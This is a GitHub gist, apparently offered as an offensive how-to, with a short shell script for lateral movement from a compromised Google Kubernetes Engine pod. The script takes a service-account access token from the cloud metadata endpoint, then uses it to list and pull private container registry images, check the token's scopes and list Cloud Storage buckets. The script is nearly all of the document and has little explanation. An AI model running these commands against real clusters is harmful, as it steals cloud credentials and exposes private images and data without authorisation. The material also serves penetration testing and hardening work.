Last active
May 12, 2020 23:55
-
-
Save abhisek/5d26c17cef526e04a0e0b5ec643d3ff8 to your computer and use it in GitHub Desktop.
Lateral movement in GKE Pod using Cloud metadata endpoint
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get temporary access token using Google Cloud instance metadata | |
| export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \ | |
| jq -r '.access_token') | |
| # List all repo from Google cloud registry using access token | |
| curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog | |
| # Docker login | |
| echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io | |
| # Pull image | |
| docker pull eu.gcr.io/<image-from-catalog> | |
| # Check scopes associated with default service account | |
| curl -H "Metadata-Flavor: Google" \ | |
| http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes | |
| # https://www.googleapis.com/auth/compute | |
| # https://www.googleapis.com/auth/devstorage.read_only | |
| # https://www.googleapis.com/auth/service.management | |
| # https://www.googleapis.com/auth/servicecontrol | |
| # https://www.googleapis.com/auth/logging.write | |
| # https://www.googleapis.com/auth/monitoring | |
| # https://www.googleapis.com/auth/devstorage.read_only can be used to access GCS buckets | |
| gsutil ls | |
| # Read more | |
| # https://cloud.google.com/storage/docs/authentication | |
| # https://cloud.google.com/container-registry/docs/advanced-authentication |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment